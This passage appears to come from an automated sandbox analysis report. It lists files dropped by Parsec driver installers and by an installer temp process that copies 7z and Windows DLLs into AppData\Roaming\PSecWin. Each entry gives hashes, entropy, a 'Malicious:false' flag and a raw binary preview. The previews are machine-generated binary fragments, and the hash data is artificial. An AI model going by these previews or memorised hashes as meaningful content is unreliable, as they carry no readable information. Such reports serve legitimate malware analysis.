                              SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                              Malicious:false
                              Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                              C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE77E.tmp

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                              Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                              C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE77F.tmp

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):26680
                              Entropy (8bit):6.39482709996269
                              Encrypted:false
                              SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                              MD5:0790B2E5B9D6B38B566C6BC796F0364A
                              SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                              SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                              SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.cat (copy)

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11858
                              Entropy (8bit):7.334407083811773
                              Encrypted:false
                              SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                              MD5:560EFA3FA6E5AB486D958B12207AC6ED
                              SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                              SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                              SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                              Malicious:false
                              Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                              C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf (copy)

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                              Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                              C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.sys (copy)

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):26680
                              Entropy (8bit):6.39482709996269
                              Encrypted:false
                              SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                              MD5:0790B2E5B9D6B38B566C6BC796F0364A
                              SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                              SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                              SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD48.tmp

                              Download File
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11928
                              Entropy (8bit):7.349994571032463
                              Encrypted:false
                              SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                              MD5:1FE1FC7CC73FB17E995D65835D51CA94
                              SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                              SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                              SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......

                              C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD68.tmp

                              Download File
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):173736
                              Entropy (8bit):6.232270251717221
                              Encrypted:false
                              SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                              MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                              SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                              SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                              SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................

                              C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFDB7.tmp

                              Download File
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):4122
                              Entropy (8bit):3.7080252993527285
                              Encrypted:false
                              SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                              MD5:D8030AFE09A2F984BE00389B31F7039B
                              SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                              SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                              SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                              Malicious:false
                              Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.

                              C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.cat (copy)

                              Download File
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11928
                              Entropy (8bit):7.349994571032463
                              Encrypted:false
                              SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                              MD5:1FE1FC7CC73FB17E995D65835D51CA94
                              SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                              SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                              SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......

                              C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.dll (copy)

                              Download File
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):173736
                              Entropy (8bit):6.232270251717221
                              Encrypted:false
                              SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                              MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                              SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                              SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                              SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................

                              C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.inf (copy)

                              Download File
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):4122
                              Entropy (8bit):3.7080252993527285
                              Encrypted:false
                              SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                              MD5:D8030AFE09A2F984BE00389B31F7039B
                              SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                              SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                              SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                              Malicious:false
                              Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.

                              C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):1841664
                              Entropy (8bit):6.286587259470902
                              Encrypted:false
                              SSDEEP:24576:E8sHeHKHplfu94i55tbhris2CCEnWaWBvYyozGUIjnRnU:E8Y/Q94iZNrP2t0ZyyIjnRnU
                              MD5:4E35A902CA8ED1C3D4551B1A470C4655
                              SHA1:AD9A9B5DBE810A6D7EA2C8430C32417D87C5930C
                              SHA-256:77222E81CB7004E8C3E077AADA02B555A3D38FB05B50C64AFD36CA230A8FD5B9
                              SHA-512:C7966F892C1F81FBE6A2197BD229904D398A299C53C24586CA77F7F657529323E5A7260ED32DA9701FCE9989B0B9A2463CD45C5A5D77E56A1EA670E02E575A30
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..07.sc7.sc7.scA-.c6.scA-.c<.sc7.rcR.scA-.c.sc!.wb4.scA-.c..sc..pb0.scA-.c6.scA-.c6.scA-.c6.scRich7.sc................PE..d....\.d.........." ................pe....................................................`..........................................-.......$..x................1...............!...................................................................................text...]........................... ..`.rdata...^.......`..................@..@.data........0......."..............@....pdata...1.......2...(..............@..@.rsrc................Z..............@..@.reloc...3.......4..................@..B........................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):557056
                              Entropy (8bit):6.204396774559151
                              Encrypted:false
                              SSDEEP:6144:mE7cV3iwbAFRWAbd4nf0H05yqE6Hl0ChW0+ksllAXBu0lWGWUJJQ4t0BHQQf+L+G:d7a3iwbihym2g7XO3LWUQfh4Co
                              MD5:9A1DD1D96481D61934DCC2D568971D06
                              SHA1:F136EF9BF8BD2FC753292FB5B7CF173A22675FB3
                              SHA-256:8CEBB25E240DB3B6986FCAED6BC0B900FA09DAD763A56FB71273529266C5C525
                              SHA-512:7AC1581F8A29E778BA1A1220670796C47FA5B838417F8F635E2CB1998A01515CFF3EE57045DACB78A8EC70D43754B970743ABA600379FE6D9481958D32D8A5AA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@...........................................`.....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):120832
                              Entropy (8bit):6.452660436286688
                              Encrypted:false
                              SSDEEP:3072:VUcCdrEZyY755X5YTC81grxQUfZtPrFD:UiyS5JYN1grxQUfZt
                              MD5:267A42F3D8CDF6FCE02BFDA76A724120
                              SHA1:9A17457DAD529419715AC6F092052FF7D1F01469
                              SHA-256:907947FCA16FAB90430F56259EB81EF0609AAAC8166BC174D129945CE78E4A5E
                              SHA-512:64C4D0E54C1D633EF3F7E31B77EA74975FA14A603E1F9590890A9741D23B6430EFC6DD2E8ADF2C0B0E55F8F2B58DF974708A8613198DCB8AD38566B37E579990
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..Eo..Eo..E{..Dc..E{..Dm..Eo..E...E{..D|..E{..Dn..E{..Dw..E{.LEn..E{..Dn..ERicho..E........PE..L....X.Y...........!...............................e................................A.....@A............................).......................................4....F..T...........................(...................|............................text............................... ..`.data...X...........................@....idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):3.3828878559559703
                              Encrypted:false
                              SSDEEP:96:vKiQPIPmWlhsyNcKXWT6w5qNeWhOWwCP:Ci5PmR+eWhOW
                              MD5:E27BB683A96D3C2338FB46385AB7F2FB
                              SHA1:FE4B1A347EE4B9C55D4A53C24C3FFD51F2547CFD
                              SHA-256:9B47A5D829F7045AF99FFD1F6380870BCE47505B41B9CBA88E94C7FC15B8C7E6
                              SHA-512:7EB8E4AF5F53D1C05F04285CAD928D2FB838E2EA7C6BCE261B668EED6C2E5A9E59ACF5213478A007C9C1D79FC291CE1858151B7E92DD6CF0E0EB4E3EF1043F4A
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...}1u............!......................... .....R.........................@............@E............................P............ .......................0..........T............................................................................data...G........................... ..`.rsrc........ ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)

                              Download File
